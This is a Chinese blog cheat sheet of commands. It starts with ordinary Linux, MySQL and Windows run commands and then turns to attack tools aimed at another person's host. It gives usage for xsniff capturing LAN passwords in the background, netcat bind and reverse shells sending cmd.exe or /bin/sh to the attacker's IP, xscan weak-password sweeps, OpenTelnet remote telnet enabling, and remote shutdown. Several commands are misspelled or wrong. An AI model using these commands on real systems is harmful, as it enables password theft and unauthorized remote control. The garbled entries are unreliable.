【Cmd】那些年,我们迷恋的cmd命令（二）

那些年，我们迷恋的命令（一）

那些年，我们迷恋的命令（二）

---

Linux系统下基本命令

1. Linux系统下基本命令： 要区分大小写

2. uname 显示版本信息（同win2K的 ver）

3. dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）

4. pwd 查询当前所在的目录位置

5. cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。

6. cat 文件名 查看文件内容

7. cat >abc.txt 往abc.txt文件中写上内容。

8. more 文件名 以一页一页的方式显示一个文本文件。

9. cp 复制文件

10. mv 移动文件

11. rm 文件名 删除文件，rm -a 目录名删除目录及子目录

12. mkdir 目录名 建立目录

13. rmdir 删除子目录，目录内没有文档。

14. chmod 设定档案或目录的存取权限

15. grep 在档案中查找字符串

16. diff 档案文件比较

17. find 档案搜寻

18. date 现在的日期、时间

19. who 查询目前和你使用同一台机器的人以及Login时间地点

20. w 查询目前上机者的详细资料

21. whoami 查看自己的帐号名称

22. groups 查看某人的Group

23. passwd 更改密码

24. history 查看自己下过的命令

25. ps 显示进程状态

26. kill 停止某进程

27. gcc 黑客通常用它来编译C语言写的文件

28. su 权限转换为指定使用者

29. telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。

30. ftp ftp连接上某服务器（同win2K）

---

MYSQL命令

1. MYSQL 命令：

2. mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。

3. （例：mysql -h110.110.110.110 -Uroot -P123456

4. 注:u与root可以不用加空格，其它也一样）

5. exit 退出MYSQL

6. mysqladmin -u用户名 -p旧密码 password 新密码 修改密码

7. grant select on 数据库.* to 用户名@登录主机 identified by "密码"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）

8. show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。

9. use mysql；

10. show tables; 显示库中的数据表

11. describe 表名; 显示数据表的结构

12. create database 库名; 建库

13. use 库名；

14. create table 表名 (字段设定列表)； 建表

15. drop database 库名;

16. drop table 表名； 删库和删表

17. delete from 表名; 将表中记录清空

18. select * from 表名; 显示表中的记录

19. mysqldump --opt school>school.bbb 备份数据库：（命令在DOS的mysqlin目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。

20. win2003系统下新增命令（实用部份）：

21. shutdown /参数 关闭或重启本地或远程主机。

22. 参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。

23. 例：shutdown /r /t 0 立即重启本地主机（无延时）

24. taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。

25. 参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。

26. tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。

27. 参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程。

---

计算机运行命令全集

1. 计算机运行命令全集 winver---------检查Windows版本

2. wmimgmt.msc----打开windows管理体系结构

3. wupdmgr--------windows更新程序

4. winver---------检查Windows版本

5. wmimgmt.msc----打开windows管理体系结构

6. wupdmgr--------windows更新程序

7. wwww--------windows脚本宿主设置

8. write----------写字板winmsd-----系统信息

9. wiaacmgr-------扫描仪和照相机向导

10. winchat--------XP自带局域网聊天

11. mem.exe--------显示内存使用情况

12. Msconfig.exe---系统配置实用程序

13. mplayer2-------简易widnows media player

14. mspaint--------画图板

15. mstsc----------远程桌面连接

16. mplayer2-------媒体播放机

17. magnify--------放大镜实用程序

18. mmc------------打开控制台

19. mobsync--------同步命令

20. dxdiag---------检查DirectX信息

21. drwtsn32------ 系统医生

22. devmgmt.msc--- 设备管理器

23. dfrg.msc-------磁盘碎片整理程序

24. diskmgmt.msc---磁盘管理实用程序

25. dcomcnfg-------打开系统组件服务

26. ddeshare-------打开DDE共享设置

27. dvdplay--------DVD播放器

28. net stop messenger-----停止信使服务

29. net start messenger----开始信使服务

30. notepad--------打开记事本

31. nslookup-------网络管理的工具向导

32. ntbackup-------系统备份和还原

33. narrator-------屏幕"讲述人"

34. ntmsmgr.msc----移动存储管理器

35. ntmsoprq.msc---移动存储管理员操作请求

36. netstat -an----(TC)命令检查接口

37. syncapp--------创建一个公文包

38. sysedit--------系统配置编辑器

39. sigverif-------文件签名验证程序

40. sndrec32-------录音机

41. shrpubw--------创建共享文件夹

42. secpol.msc-----本地安全策略

43. syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密码

44. services.msc---本地服务设置

45. Sndvol32-------音量控制程序

46. sfc.exe--------系统文件检查器

47. sfc /scannow---windows文件保护

48. tsshutdn-------60秒倒计时关机命令

49. tourstart------xp简介（安装完成后出现的漫游xp程序）

50. taskmgr--------任务管理器

51. eventvwr-------事件查看器

52. eudcedit-------造字程序

53. explorer-------打开资源管理器

54. packager-------对象包装程序

55. perfmon.msc----计算机性能监测程序

56. progman--------程序管理器

57. regedit.exe----注册表

58. rsop.msc-------组策略结果集

59. regedt32-------注册表编辑器

60. rononce -p ----15秒关机

61. regsvr32 /u *.dll----停止dll文件运行

62. regsvr32 /u zipfldr.dll------取消ZIP支持

63. cmd.exe--------CMD命令提示符

64. chkdsk.exe-----Chkdsk磁盘检查

65. certmgr.msc----证书管理实用程序

66. calc-----------启动计算器

67. charmap--------启动字符映射表

68. cliconfg-------SQL SERVER 客户端网络实用程序

69. Clipbrd--------剪贴板查看器

70. conf-----------启动netmeeting

71. compmgmt.msc---计算机管理

72. cleanmgr-------**整理

73. ciadv.msc------索引服务程序

74. osk------------打开屏幕键盘

75. odbcad32-------ODBC数据源管理器

76. oobe/msoobe /a----检查XP是否激活

77. lusrmgr.msc----本机用户和组

78. logoff---------注销命令

79. iexpress-------木马捆绑工具，系统自带

80. Nslookup-------IP地址侦测器

81. fsmgmt.msc-----共享文件夹管理器

82. utilman--------辅助工具管理器

83. gpedit.msc-----组策略

---

命令行方式嗅探器

1. 命令行方式嗅探器xsniff

2. :

3. 可捕获局域网内FTP/SMTP/POP3/HTTP协议密码

4. 参数说明

5. -tcp 输出TCP数据报

6. -udp 输出UDP数据报

7. -icmp 输出ICMP数据报

8. -pass 过滤密码信息

9. -hide 后台运行

10. -host 解析主机名

11. -addr IP地址 过滤IP地址

12. -port 端口 过滤端口

13. -log 文件名 将输出保存到文件

14. -asc 以ASCII形式输出

15. -hex 以16进制形式输出

16. 用法示例

17. xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中

18. xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出

---

瑞士军刀

1. 瑞士军刀：nc.exe

2. 参数说明：

3. -h 查看帮助信息

4. -d 后台模式

5. -e prog程序重定向，一但连接就执行［危险］

6. -i secs延时的间隔

7. -l 监听模式，用于入站连接

8. -L 监听模式，连接天闭后仍然继续监听，直到CTR+C

9. -n IP地址，不能用域名

10. -o film记录16进制的传输

11. -p[空格]端口 本地端口号

12. -r 随机本地及远程端口

13. -t 使用Telnet交互方式

14. -u UDP模式

15. -v 详细输出，用-vv将更详细

16. -w数字 timeout延时间隔

17. -z 将输入，输出关掉（用于扫锚时）

18. 基本用法：

19. nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口

20. nc -l -p 80 开启本机的TCP 80端口并监听

21. nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口

22. nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口

23. nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口

24. 高级用法：

25. nc -L -p 80 作为蜜罐用1：开启并不停地监听80端口，直到CTR+C为止

26. nc -L -p 80 > c:log.txt 作为蜜罐用2：开启并不停地监听80端口，直到CTR+C,同时把结果输出到c:log.txt

27. nc -L -p 80 <c:honeyport.txt 作为蜜罐用3-1：开启并不停地监听80端口，直到CTR+C,并把c:honeyport.txt中内容送入管道中，亦可起到传送文件作用

28. type.exe c:honeyport | nc -L -p 80 作为蜜罐用3-2：开启并不停地监听80端口，直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用

29. 本机上用：nc -l -p 本机端口

30. 在对方主机上用：nc -e cmd.exe 本机IP -p 本机端口 *win2K

31. nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙

32. 本机上用：nc -d -l -p 本机端口 < 要传送的文件路径及名称

33. 在对方主机上用：nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机

34. 备 注：

35. | 管道命令

36. < 或 > 重定向命令。“<”，例如：tlntadmn <test.txt 指把test.txt的内容赋值给tlntadmn命令

37. ＠ 表示执行＠后面的命令，但不会显示出来（后台执行）；例：＠dir c:winnt >> d:log.txt 意思是：后台执行dir，并把结果存在d:log.txt中

38. >与>>的区别 　">"指：覆盖；">>"指：保存到(添加到）。

39. 如：@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二个命令分别执行二次比较看：用>>的则是把二次的结果都保存了，而用：>则只有一次的结果，是因为第二次的结果把第一次的覆盖了。

---

扫描工具

1. 扫描工具：xscan

2. 基本格式

3. xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息

4. xscan -file <主机列表文件名><检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息

5. 检测项目

6. -active 检测主机是否存活

7. -os 检测远程操作系统类型（通过NETBIOS和SNMP协议）

8. -port 检测常用服务的端口状态

9. -ftp 检测FTP弱口令

10. -pub 检测FTP服务匿名用户写权限

11. -pop3 检测POP3-Server弱口令

12. -smtp 检测SMTP-Server漏洞

13. -sql 检测SQL-Server弱口令

14. -smb 检测NT-Server弱口令

15. -iis 检测IIS编码/解码漏洞

16. -cgi 检测CGI漏洞

17. -nasl 加载Nessus攻击脚本

18. -all 检测以上所有项目

19. 其它选项

20. -i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取

21. -l 显示所有网络适配器

22. -v 显示详细扫描进度

23. -p 跳过没有响应的主机

24. -o 跳过没有检测到开放端口的主机

25. 　 -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10

26. -log 文件名 指定扫描报告文件名 (后缀为：TXT或HTML格式的文件)

27. 用法示例

28. xscan -host 192.168.1.1-192.168.255.255 -all -active -p　 检测192.168.1.1-192.168.255.255网段内主机的所有漏洞，跳过无响应的主机

29. xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态，NT弱口令用户，最大并发线程数量为150，跳过没有检测到开放端口的主机

30. xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态，CGI漏洞，最大并发线程数量为200，同一时刻最多检测5台主机，显示详细检测进度，跳过没有检测到开放端口的主机

---

其它

1. Shutdown.exe

2. Shutdown IP地址 t:20 20秒后将对方NT自动关闭（Windows 2003系统自带工具，在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。）

3. fpipe.exe (TCP端口重定向工具) 在第二篇中有详细说明（端口重定向绕过防火墙）

4. fpipe -l 80 -s 1029 -r 80 www.sina.com.cn 当有人扫锚你的80端口时，他扫到的结果会完全是www.sina.com.cn的主机信息

5. Fpipe -l 23 -s 88 -r 23 目标IP 把本机向目标IP发送的23端口Telnet请求经端口重定向后，就通过88端口发送到目标IP的23端口。（与目标IP建立Telnet时本机就用的88端口与其相连接）然后：直接Telnet 127.0.0.1（本机IP）就连接到目标IP的23端口了。

6. OpenTelnet.exe (远程开启telnet工具)

7. opentelnet.exe IP 帐号　密码　ntlm认证方式　Telnet端口 （不需要上传ntlm.exe破坏微软的身份验证方式）直接远程开启对方的telnet服务后，就可用telnet ip 连接上对方。

8. NTLM认证方式：０：不使用NTLM身份验证；１：先尝试NTLM身份验证，如果失败，再使用用户名和密码；２：只使用NTLM身份验证。

9. ResumeTelnet.exe (OpenTelnet附带的另一个工具)

10. resumetelnet.exe IP　帐号　密码 用Telnet连接完对方后，就用这个命令将对方的Telnet设置还原，并同时关闭Telnet服务。

本文出自 “成鹏致远” 博客，请务必保留此出处http://infohacker.blog.51cto.com/6751239/1171491